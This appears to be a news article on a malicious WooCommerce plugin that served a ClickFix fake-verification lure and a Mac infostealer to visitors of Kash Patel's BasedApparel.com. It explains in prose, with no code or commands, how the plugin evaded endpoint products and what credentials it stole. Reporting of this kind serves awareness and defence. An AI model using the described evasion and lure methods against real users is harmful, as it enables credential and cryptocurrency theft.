Malicious WordPress Plugin Evaded 5 Endpoint Security Products on Kash Patel's Site

A single malicious plugin inside a WordPress e-commerce site evaded detection from 5 enterprise security products at the same time — CrowdStrike, SentinelOne, TrendMicro, Symantec, and Malwarebytes — before delivering a credential-stealing attack to visitors. That is the structural fact at the center of a breach that hit Kash Patel's BasedApparel.com storefront, and it is the reason security teams should care beyond the political entry point.

The attack itself used a known technique called ClickFix, in which a website displays a fake security prompt and tricks users into copying a command into their terminal that installs malware instead of completing a verification. Microsoft documented the method in May 2026, noting it had been pervasive since February, using fake CAPTCHA and Cloudflare overlays to get users to run encoded commands on their own machines. PCMag verified the attack on a live MacBook and confirmed it worked exactly as described.

What was new about the BasedApparel case was not the technique. It was the delivery vehicle: a single compromised plugin inside the WooCommerce store, installed by whoever previously accessed the site's backend. The plugin registered a hidden command-and-control endpoint and served different content to different visitors, which is how it evaded endpoint software that monitors behavior at the device level. A security researcher who goes by WifiRumHam identified both the malicious plugin and the simultaneous miss across 5 enterprise security products. The same researcher found a separate payment card skimmer embedded in the checkout page, Straight Arrow News reported.

The endpoint security miss is the part that should concern every organization running WordPress or WooCommerce. WordPress powers roughly 40 percent of commercial websites globally, and WooCommerce accounts for a substantial portion of those that run online stores. Plugin vulnerabilities and malicious plugin insertions are a documented pattern in WordPress security research — the specific approach of compromising a store's backend to install a plugin that then serves different content to visitors has appeared in multiple campaigns, not only in this case. Plugins operate in the application layer — inside the website itself, not on the visitor's device — which means they can serve different content to different users, modify clipboard contents, and register hidden API endpoints without endpoint software at the device level ever registering behavior it recognizes as malicious. Enterprise security products catch malware that executes on a machine. They do not catch a compromised plugin that alters what the browser displays or what ends up on the clipboard. That gap is structural, not incidental.

Patel's site was distributing malware for at least a day before going offline on May 22, TechCrunch reported. As of publication, the FBI had not announced an investigation into the malware distribution. The bureau told Straight Arrow News that Patel had divested from any interest in Based Apparel before his confirmation as director and does not profit from site sales. Based Apparel did not respond to multiple requests for comment. Patel himself has not publicly addressed the incident.

The infostealer targeted Mac users with cryptocurrency holdings specifically, according to WifiRumHam's analysis: login credentials and cookies from more than 200 crypto browser extensions, along with Safari data and Mac system keychain passwords. The VirusTotal sample was flagged by 27 antivirus engines at the time of testing. The server receiving the stolen data was registered to monterushy[.]com.

The site had prior security problems. In late March, the Iranian-linked hacker group Handala published more than 300 emails from Patel's personal Gmail inbox, including family photos and his resume.

The question the FBI has not answered is what it is doing about this. A bureau spokesperson declined to confirm an investigation. That is not unusual in early stages of a cyber incident, but it leaves open whether this is being treated as a criminal matter, a national security matter, or something else. The site remains offline with a holding page that promises a return "bolder than ever."

The supply chain that made the attack possible is not unique to BasedApparel. The plugin vulnerability and the structural detection gap run through millions of WooCommerce stores. The malicious plugin was not a zero-day — it exploited a known pattern of WordPress plugin compromise documented in security research for years. The reason 5 enterprise products missed it simultaneously is not a mystery: they are not designed to catch it. Who, if anyone, is working to close that gap is the question the security industry has not yet answered.